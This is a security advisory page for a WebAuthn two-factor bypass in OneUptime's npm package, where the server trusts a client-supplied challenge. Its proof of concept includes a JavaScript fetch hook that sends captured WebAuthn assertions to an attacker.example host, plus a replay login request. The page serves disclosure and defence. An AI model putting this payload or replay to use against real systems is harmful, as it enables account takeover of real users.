Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-gjjc-pcwp-c74m

HIGH

OneUptime has WebAuthn 2FA bypass: server accepts client-supplied challenge instead of server-stored value, allowing credential replay

Also known asCVE-2026-28787
Published
Mar 2, 2026
Updated
Mar 6, 2026
Affected
1 pkg
Patched
None yet
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.3%probability of exploitation in next 30 days
Lower Risk19th percentile+0.21%
0.00%0.26%0.52%0.78%0.0%0.0%0.1%0.3%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

@oneuptime/commonnpm
6Kdownloads / week

Description

Summary

The WebAuthn authentication implementation does not store the challenge on the server side. Instead, the challenge is returned to the client and accepted back from the client request body during verification. This violates the WebAuthn specification (W3C Web Authentication Level 2, §13.4.3) and allows an attacker who has obtained a valid WebAuthn assertion (e.g., via XSS, MitM, or log exposure) to replay it indefinitely, completely bypassing the second-factor authentication.

Details

During WebAuthn authentication, the server generates a random challenge via generateAuthenticationOptions() in Common/Server/Services/UserWebAuthnService.ts (line 164-221). However, the challenge is only returned to the client and never stored in a session or database on the server side.

When the client submits the authentication response, the server reads the expectedChallenge directly from the untrusted request body (Authentication.ts:1042):

// App/FeatureSet/Identity/API/Authentication.ts:1041-1049
} else if (verifyWebAuthn) {
  const expectedChallenge: string = data["challenge"] as string;  // ← client-controlled
  const credential: any = data["credential"];

  await UserWebAuthnService.verifyAuthentication({
    userId: alreadySavedUser.id!.toString(),
    challenge: expectedChallenge,  // ← NOT a server-stored value
    credential: credential,
  });
}

The verifyAuthentication() method then passes this client-provided challenge to @simplewebauthn/server's verifyAuthenticationResponse() as expectedChallenge (UserWebAuthnService.ts:268-270):

const verification: any = await verifyAuthenticationResponse({
  response: data.credential,
  expectedChallenge: data.challenge,  // ← client-controlled value used as "expected"
  expectedOrigin: expectedOrigin,
  expectedRPID: Host.toString(),
  credential: { /* public key from DB */ },
});

Since both the expectedChallenge (from request body) and the challenge embedded in the credential's clientDataJSON originate from the same captured assertion, they will always match. The cryptographic signature also remains valid because it was signed by the legitimate user's authenticator.

Correct flow vs. OneUptime's flow:

StepCorrect WebAuthnOneUptime
1. Generate challengeServer generates random challengeSame
2. Store challengeSaved in session/DBNot saved anywhere
3. Send to clientSent to clientSame
4. Authenticator signsAuthenticator signs challengeSame
5. Client returnsReturns signed credentialReturns credential + challenge
6. VerifyCompares against server-stored valueCompares against client-provided value
ResultReplay-proofReplayable

PoC

Prerequisites:

  • An attacker has obtained the victim's password (e.g., credential stuffing, phishing)
  • An attacker has captured a valid WebAuthn assertion from the victim (e.g., via XSS on a OneUptime page, network interception, or log leakage)

Steps to reproduce:

  1. Capture a valid WebAuthn assertion. Intercept or extract a legitimate authentication request containing challenge and credential fields. For example, by injecting JavaScript via stored XSS in a Mermaid diagram on a status page (related vulnerability):

    // XSS payload to intercept WebAuthn authentication
    const origFetch = window.fetch;
    window.fetch = async function(url, opts) {
      if (url.includes('/verify') && opts?.body) {
        const body = JSON.parse(opts.body);
        if (body.data?.credential) {
          // Exfiltrate the assertion
          navigator.sendBeacon('https://attacker.example/collect', JSON.stringify({
            challenge: body.data.challenge,
            credential: body.data.credential
          }));
        }
      }
      return origFetch.apply(this, arguments);
    };
    
  2. Replay the captured assertion at any later time. Send the following request with the victim's email, password, and the captured challenge + credential:

    POST /api/identity/authentication/login HTTP/1.1
    Content-Type: application/json
    
    {
      "data": {
        "email": "[email protected]",
        "password": "<victim's password>",
        "challenge": "<captured challenge value>",
        "credential": {
          "id": "<captured credential id>",
          "rawId": "<captured rawId>",
          "response": {
            "authenticatorData": "<captured authenticatorData>",
            "clientDataJSON": "<captured clientDataJSON>",
            "signature": "<captured signature>"
          },
          "type": "public-key",
          "clientExtensionResults": {},
          "authenticatorAttachment": "platform"
        }
      }
    }
    
  3. Result: The server accepts the authentication. The expectedChallenge (from the request body) matches the challenge in clientDataJSON (from the same captured assertion), and the signature is valid (signed by the real user's key). A session token is returned, granting full access to the victim's account.

    The attacker bypasses WebAuthn 2FA without possessing the victim's authenticator device.

Impact

WebAuthn 2FA is rendered ineffective. The entire purpose of WebAuthn as a second factor is to protect accounts when passwords are compromised. This vulnerability means that once an attacker has both the password and a single captured assertion, they can authenticate as the victim indefinitely — the assertion never expires because there is no server-side challenge state to invalidate.

Who is impacted: Any OneUptime user who has enrolled WebAuthn/Passkey as their second factor. The 2FA protection they rely on provides no meaningful security against an attacker who has obtained their password and intercepted one authentication exchange.

Attack chain potential: This vulnerability can be chained with:

  • Stored XSS (e.g., via Mermaid rendering in status pages) to capture assertions
  • Absence of rate limiting on authentication endpoints to obtain passwords via credential stuffing
  • User enumeration via differential error messages to identify valid targets

Affected Packages

1 total
EcosystemPackageVulnerable rangeFix
📦npm@oneuptime/commonall versionsNo fix

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @oneuptime/common. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Remediation status

    No patched version of @oneuptime/common has shipped for GHSA-gjjc-pcwp-c74m yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.

  3. Mitigate without a patch

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-gjjc-pcwp-c74m is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-gjjc-pcwp-c74m. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary The WebAuthn authentication implementation does not store the challenge on the server side. Instead, the challenge is returned to the client and accepted back from the client request body during verification. This violates the WebAuthn specification ([W3C Web Authentication Level 2, §13.4.3](https://www.w3.org/TR/webauthn-2/#sctn-cryptographic-challenges)) and allows an attacker who has obtained a valid WebAuthn assertion (e.g., via XSS, MitM, or log exposure) to replay it indefinitely, completely bypassing the second-factor authentication. ### Details During WebAuthn authentica
O3 Security · Impact-Aware SCA

Is GHSA-gjjc-pcwp-c74m in your dependencies?

O3 detects GHSA-gjjc-pcwp-c74m across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.